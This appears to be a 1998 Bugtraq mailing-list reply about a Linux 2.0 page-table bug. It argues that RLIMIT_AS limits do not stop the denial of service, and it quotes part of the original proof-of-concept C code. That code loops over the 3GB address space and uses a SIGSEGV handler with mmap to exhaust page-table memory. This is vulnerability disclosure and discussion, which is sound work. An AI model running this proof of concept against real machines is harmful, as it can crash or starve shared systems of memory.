Bugtraq mailing list archives
Re: linux 2.0 PTE bug
From: peak () kerberos troja mff cuni cz (Pavel Kankovsky)
Date: Thu, 28 May 1998 21:23:34 +0200
On Tue, 26 May 1998 pedward () WEBCOM COM wrote:
(it really has nothing to do with resources). The main factor is RLIMIT_AS, defined in /usr/src/linux/include/asm/resource.h, it controls how much virtual memory that a process can map, mmap utilizes virtual memory. You can safely throttle people by running a program which calls setrlimit(2) with RLIMIT_AS as the resource. By far, 3GB is too much. This is only a DoS if you LET it be a DoS.
No. Re-read the program carefully: <quote author="p6mip300 () INFOP6 CICRP JUSSIEU FR"> void the_handler(int x) { signal(SIGSEGV, the_handler); touch_me++; if(mmap((void *)address, 4, PROT_READ, MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) { perror("mmap"); exit(1); } } void main(void) { [...] signal(SIGSEGV, the_handler); /* 3*1024*1024*1024 = TASK_SIZE, * 1024*4096 = number of bytes one pte can map */ for (address=0; address<3*1024*1024*1024; address+=1024*4096) { i=*(unsigned long *)address; if (touch_me) { touch_me=0; munmap((void *)address, 4); } } [...] } </quote> The program allocates ONE page for each 4MB block of address space. This makes 768 pages (3MB). It would hardly hit a (reasonable) AS limit even if it did not disallocate the page having touched it. It can run with RLIMIT_AS set to 1MB. At least on my system--I have tried it (according to /proc/*/status, VmSize was 904 kB). --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
Current thread:
- linux 2.0 PTE bug XXX_p6mip300 (May 25)
- Re: linux 2.0 PTE bug pedward () WEBCOM COM (May 26)
- Re: linux 2.0 PTE bug Pavel Kankovsky (May 28)
- <Possible follow-ups>
- Re: linux 2.0 PTE bug Jason Thorpe (May 26)
- Re: linux 2.0 PTE bug pedward () WEBCOM COM (May 26)